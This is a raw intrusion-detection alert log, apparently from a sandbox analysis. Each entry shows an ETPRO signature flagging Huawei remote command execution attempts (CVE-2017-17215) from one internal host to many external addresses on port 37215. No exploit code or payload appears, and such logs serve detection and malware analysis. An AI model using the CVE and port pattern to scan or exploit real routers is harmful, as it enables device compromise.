                                                        06/13/24-21:32:03.306603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590037215192.168.2.14156.188.5.185
                                                        06/13/24-21:32:30.078397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484837215192.168.2.14156.251.173.70
                                                        06/13/24-21:32:21.806008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656437215192.168.2.14197.202.99.58
                                                        06/13/24-21:32:11.510217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558637215192.168.2.14197.183.8.238
                                                        06/13/24-21:33:11.155989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194037215192.168.2.14197.93.121.30
                                                        06/13/24-21:32:15.607394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035437215192.168.2.14197.76.172.135
                                                        06/13/24-21:32:25.993405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626237215192.168.2.14197.243.166.39
                                                        06/13/24-21:33:09.125842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673437215192.168.2.14197.224.208.232
                                                        06/13/24-21:32:21.800691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848037215192.168.2.14156.171.253.133
                                                        06/13/24-21:33:15.272957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733837215192.168.2.14197.171.16.21
                                                        06/13/24-21:32:48.554015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383437215192.168.2.14197.128.241.238
                                                        06/13/24-21:33:09.127706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047037215192.168.2.14156.58.211.251
                                                        06/13/24-21:32:52.654216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151837215192.168.2.14197.249.18.71
                                                        06/13/24-21:32:17.678109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048437215192.168.2.14156.153.203.66
                                                        06/13/24-21:32:38.300777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346237215192.168.2.14197.205.136.112
                                                        06/13/24-21:33:07.042252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667437215192.168.2.14197.94.77.252
                                                        06/13/24-21:33:07.056508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701837215192.168.2.14156.195.103.189
                                                        06/13/24-21:33:11.160081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174437215192.168.2.14156.126.119.170
                                                        06/13/24-21:33:15.259041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052237215192.168.2.14156.168.204.203
                                                        06/13/24-21:32:28.044542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4012437215192.168.2.14156.25.53.107
                                                        06/13/24-21:32:17.677391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446037215192.168.2.14197.186.19.161
                                                        06/13/24-21:32:32.168126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.1441.152.109.188
                                                        06/13/24-21:31:57.092220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.1441.133.250.50
                                                        06/13/24-21:32:54.725613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314637215192.168.2.14156.131.149.176
                                                        06/13/24-21:32:13.545336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982637215192.168.2.14156.152.77.111
                                                        06/13/24-21:32:46.524286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037637215192.168.2.1441.209.179.156
                                                        06/13/24-21:32:25.977517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615237215192.168.2.14156.130.189.163
                                                        06/13/24-21:32:46.526256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410037215192.168.2.14156.153.105.72
                                                        06/13/24-21:32:17.678340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379237215192.168.2.1441.160.164.82
                                                        06/13/24-21:32:30.128296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114637215192.168.2.14197.22.221.144
                                                        06/13/24-21:32:56.789773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372837215192.168.2.14156.53.80.11
                                                        06/13/24-21:32:50.630587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224637215192.168.2.1441.24.255.112
                                                        06/13/24-21:33:09.106734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.14197.198.205.200
                                                        06/13/24-21:32:03.308037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434637215192.168.2.14156.204.251.70
                                                        06/13/24-21:33:02.912576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.1441.108.217.86
                                                        06/13/24-21:32:34.213105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560237215192.168.2.14197.179.174.200
                                                        06/13/24-21:32:50.613383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.14197.237.124.125
                                                        06/13/24-21:33:09.106427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466637215192.168.2.14197.156.117.164
                                                        06/13/24-21:33:00.887152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976237215192.168.2.14197.140.225.77
                                                        06/13/24-21:32:58.843739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.1441.178.152.21
                                                        06/13/24-21:33:13.213937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806637215192.168.2.1441.171.241.154
                                                        06/13/24-21:32:32.165891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284837215192.168.2.1441.129.192.141
                                                        06/13/24-21:33:17.339019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753637215192.168.2.1441.252.66.172
                                                        06/13/24-21:32:32.155040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391437215192.168.2.14197.210.129.204
                                                        06/13/24-21:32:42.422352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921837215192.168.2.1441.3.107.124
                                                        06/13/24-21:33:04.990572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540237215192.168.2.14156.30.147.12
                                                        06/13/24-21:33:15.272402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881637215192.168.2.14156.6.35.242
                                                        06/13/24-21:32:32.156519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857637215192.168.2.14197.196.31.5
                                                        06/13/24-21:32:17.676438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314437215192.168.2.14156.240.71.65
                                                        06/13/24-21:32:05.378433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621837215192.168.2.14156.176.181.151
                                                        06/13/24-21:32:32.154207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179637215192.168.2.14197.24.199.226
                                                        06/13/24-21:32:11.509353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892837215192.168.2.14197.214.224.32
                                                        06/13/24-21:32:48.553736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996237215192.168.2.14197.7.65.132
                                                        06/13/24-21:32:09.439249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626637215192.168.2.14197.40.43.83
                                                        06/13/24-21:32:17.695071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622837215192.168.2.14156.107.231.95
                                                        06/13/24-21:33:15.256576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357437215192.168.2.14197.106.201.62
                                                        06/13/24-21:32:30.075395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087237215192.168.2.1441.253.72.166
                                                        06/13/24-21:32:54.710737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998037215192.168.2.1441.53.247.59
                                                        06/13/24-21:32:38.301690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934437215192.168.2.14156.40.241.212
                                                        06/13/24-21:32:50.613040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517837215192.168.2.14156.211.16.160
                                                        06/13/24-21:33:04.992459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545637215192.168.2.1441.171.28.17
                                                        06/13/24-21:32:11.487158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.1441.103.101.183
                                                        06/13/24-21:33:09.130641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103237215192.168.2.1441.245.20.29
                                                        06/13/24-21:32:46.524433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716037215192.168.2.14156.122.246.139
                                                        06/13/24-21:32:23.835673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845837215192.168.2.14156.127.72.145
                                                        06/13/24-21:32:13.568044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216637215192.168.2.14156.25.104.138
                                                        06/13/24-21:32:46.526199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859037215192.168.2.14156.178.204.238
                                                        06/13/24-21:32:09.439514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117437215192.168.2.14156.92.79.135
                                                        06/13/24-21:33:02.937201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488037215192.168.2.1441.242.94.36
                                                        06/13/24-21:32:25.995205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823637215192.168.2.14156.164.161.109
                                                        06/13/24-21:32:13.567110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375837215192.168.2.14197.164.210.122
                                                        06/13/24-21:32:13.544880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5340637215192.168.2.14197.202.185.200
                                                        06/13/24-21:31:59.174527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815837215192.168.2.14156.116.143.128
                                                        06/13/24-21:32:09.455834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833237215192.168.2.14156.235.241.35
                                                        06/13/24-21:33:09.089857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624237215192.168.2.14156.156.184.248
                                                        06/13/24-21:32:40.375559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956437215192.168.2.1441.221.63.80
                                                        06/13/24-21:32:44.452980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920837215192.168.2.14197.236.212.199
                                                        06/13/24-21:32:58.824305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664237215192.168.2.14197.2.16.161
                                                        06/13/24-21:32:34.212861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118037215192.168.2.1441.26.34.238
                                                        06/13/24-21:32:36.247429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249437215192.168.2.1441.14.149.202
                                                        06/13/24-21:31:59.196114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266237215192.168.2.14156.34.21.252
                                                        06/13/24-21:32:07.416217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618237215192.168.2.14156.69.232.206
                                                        06/13/24-21:33:05.011690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5696237215192.168.2.14156.84.245.161
                                                        06/13/24-21:31:57.092573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736637215192.168.2.1441.1.138.117
                                                        06/13/24-21:33:00.868922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757837215192.168.2.1441.236.42.125
                                                        06/13/24-21:32:30.100366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254437215192.168.2.1441.86.198.29
                                                        06/13/24-21:32:56.756479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586437215192.168.2.14197.33.151.23
                                                        06/13/24-21:32:36.248085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492237215192.168.2.14197.188.184.129
                                                        06/13/24-21:33:15.253913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874237215192.168.2.1441.150.239.171
                                                        06/13/24-21:32:34.199515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407437215192.168.2.14197.114.141.225
                                                        06/13/24-21:33:00.885014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930837215192.168.2.14156.230.40.12
                                                        06/13/24-21:32:34.195157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613037215192.168.2.14197.1.69.77
                                                        06/13/24-21:32:54.727419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661237215192.168.2.14197.134.35.163
                                                        06/13/24-21:33:07.040813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.14197.16.46.88
                                                        06/13/24-21:33:09.090542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336037215192.168.2.1441.206.74.223
                                                        06/13/24-21:32:38.302848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630037215192.168.2.1441.26.48.235
                                                        06/13/24-21:33:02.909296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3745237215192.168.2.1441.148.170.49
                                                        06/13/24-21:32:48.572924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.14197.110.115.230
                                                        06/13/24-21:33:13.213816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022237215192.168.2.1441.166.40.228
                                                        06/13/24-21:32:36.269415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264637215192.168.2.1441.163.199.220
                                                        06/13/24-21:32:01.248105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130037215192.168.2.14156.251.37.245
                                                        06/13/24-21:32:28.044008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505437215192.168.2.1441.88.226.243
                                                        06/13/24-21:33:02.913292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803637215192.168.2.14156.47.18.2
                                                        06/13/24-21:32:56.754555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358437215192.168.2.14156.150.100.98
                                                        06/13/24-21:33:11.159874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.14156.19.130.239
                                                        06/13/24-21:32:17.696720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707037215192.168.2.14156.66.29.166
                                                        06/13/24-21:32:03.299151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113837215192.168.2.1441.73.50.38
                                                        06/13/24-21:32:30.099779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.14197.63.35.89
                                                        06/13/24-21:33:17.306868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.1441.107.242.74
                                                        06/13/24-21:32:07.403912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6029837215192.168.2.14197.133.242.222
                                                        06/13/24-21:32:58.821177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805637215192.168.2.14156.168.171.69
                                                        06/13/24-21:32:15.632543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.1441.10.213.224
                                                        06/13/24-21:33:02.913915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649437215192.168.2.1441.96.214.171
                                                        06/13/24-21:33:13.231998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950237215192.168.2.14156.67.23.163
                                                        06/13/24-21:31:59.175776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556637215192.168.2.14156.102.62.53
                                                        06/13/24-21:32:17.697202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211837215192.168.2.14156.23.48.106
                                                        06/13/24-21:33:00.869817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871837215192.168.2.14197.165.32.161
                                                        06/13/24-21:32:23.831365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919837215192.168.2.1441.236.174.3
                                                        06/13/24-21:32:13.547196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.14156.139.21.200
                                                        06/13/24-21:32:44.478174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882637215192.168.2.14156.22.151.21
                                                        06/13/24-21:32:50.612411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325837215192.168.2.14197.186.12.61
                                                        06/13/24-21:31:57.135882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737237215192.168.2.1441.203.39.0
                                                        06/13/24-21:32:32.166920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178637215192.168.2.14156.150.67.135
                                                        06/13/24-21:32:17.694419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859037215192.168.2.14156.109.0.210
                                                        06/13/24-21:32:46.503752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.1441.139.87.192
                                                        06/13/24-21:32:11.486941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987237215192.168.2.14156.92.140.185
                                                        06/13/24-21:32:21.804958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766637215192.168.2.14156.132.174.64
                                                        06/13/24-21:32:58.824220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784037215192.168.2.14156.245.199.134
                                                        06/13/24-21:32:38.303950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358637215192.168.2.14156.31.195.203
                                                        06/13/24-21:33:07.058705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784437215192.168.2.14197.80.52.177
                                                        06/13/24-21:32:54.710810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815237215192.168.2.14156.105.12.29
                                                        06/13/24-21:32:28.029032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108637215192.168.2.1441.60.128.173
                                                        06/13/24-21:33:05.014690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759237215192.168.2.14197.162.95.214
                                                        06/13/24-21:32:19.728443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534837215192.168.2.14197.70.177.192
                                                        06/13/24-21:32:36.245846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070237215192.168.2.14197.101.157.187
                                                        06/13/24-21:31:57.137874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412837215192.168.2.14197.9.190.76
                                                        06/13/24-21:33:02.953850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250237215192.168.2.1441.181.212.218
                                                        06/13/24-21:32:34.196562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873437215192.168.2.14197.29.228.104
                                                        06/13/24-21:32:40.358915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436037215192.168.2.14197.2.175.245
                                                        06/13/24-21:33:09.111834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603437215192.168.2.14197.194.244.110
                                                        06/13/24-21:32:40.373151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.14197.42.64.88
                                                        06/13/24-21:32:28.044815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754037215192.168.2.1441.143.194.64
                                                        06/13/24-21:32:40.371870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398437215192.168.2.14197.224.236.207
                                                        06/13/24-21:32:54.710210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.14156.191.157.63
                                                        06/13/24-21:32:25.969166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124437215192.168.2.14156.37.6.201
                                                        06/13/24-21:33:17.305015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097037215192.168.2.14156.252.111.195
                                                        06/13/24-21:32:30.127085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993037215192.168.2.14197.111.133.154
                                                        06/13/24-21:32:28.026696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544637215192.168.2.14197.224.81.177
                                                        06/13/24-21:32:54.709870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745637215192.168.2.14197.111.100.208
                                                        06/13/24-21:32:56.756316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.1441.30.12.126
                                                        06/13/24-21:32:34.213640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481637215192.168.2.1441.78.186.16
                                                        06/13/24-21:32:46.502580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356437215192.168.2.14156.103.203.193
                                                        06/13/24-21:33:09.106950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769437215192.168.2.1441.96.196.92
                                                        06/13/24-21:32:09.456477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666037215192.168.2.1441.64.14.191
                                                        06/13/24-21:32:28.028240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501837215192.168.2.1441.245.229.183
                                                        06/13/24-21:32:44.478081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104837215192.168.2.1441.44.32.207
                                                        06/13/24-21:32:46.509997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353037215192.168.2.1441.191.88.228
                                                        06/13/24-21:33:07.056917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570637215192.168.2.14156.199.94.108
                                                        06/13/24-21:32:44.450544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374037215192.168.2.1441.41.25.247
                                                        06/13/24-21:32:07.404009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026237215192.168.2.14156.2.146.25
                                                        06/13/24-21:32:05.343845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351637215192.168.2.14197.215.140.204
                                                        06/13/24-21:32:11.488358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418437215192.168.2.14156.189.118.203
                                                        06/13/24-21:33:00.868638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610037215192.168.2.14156.219.151.227
                                                        06/13/24-21:33:00.888691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153037215192.168.2.14156.136.121.91
                                                        06/13/24-21:32:40.358781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582637215192.168.2.14156.147.130.92
                                                        06/13/24-21:32:46.501645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336837215192.168.2.14197.13.76.132
                                                        06/13/24-21:32:48.570402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.14156.104.91.23
                                                        06/13/24-21:32:19.731196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537437215192.168.2.14197.4.154.226
                                                        06/13/24-21:32:30.078864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535437215192.168.2.1441.153.6.21
                                                        06/13/24-21:32:19.727429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341837215192.168.2.1441.139.94.47
                                                        06/13/24-21:32:28.048639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898837215192.168.2.14156.141.148.235
                                                        06/13/24-21:32:13.570422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779237215192.168.2.14156.173.123.3
                                                        06/13/24-21:32:52.659903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387837215192.168.2.1441.237.133.44
                                                        06/13/24-21:33:07.037930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439837215192.168.2.14156.192.211.222
                                                        06/13/24-21:32:19.730554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423437215192.168.2.1441.4.135.57
                                                        06/13/24-21:32:56.755837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952037215192.168.2.14197.45.158.177
                                                        06/13/24-21:33:11.155169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409437215192.168.2.14156.190.198.5
                                                        06/13/24-21:32:36.245438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865637215192.168.2.14197.127.206.56
                                                        06/13/24-21:32:52.676382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843437215192.168.2.1441.150.25.214
                                                        06/13/24-21:32:30.077513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324637215192.168.2.14156.114.105.196
                                                        06/13/24-21:33:02.911342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892837215192.168.2.14156.27.152.233
                                                        06/13/24-21:33:09.086705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794237215192.168.2.1441.169.101.221
                                                        06/13/24-21:32:54.707307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1441.98.32.141
                                                        06/13/24-21:32:48.572116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087637215192.168.2.1441.175.85.24
                                                        06/13/24-21:32:44.474023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614037215192.168.2.14197.113.25.153
                                                        06/13/24-21:31:59.176712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862837215192.168.2.14156.8.66.172
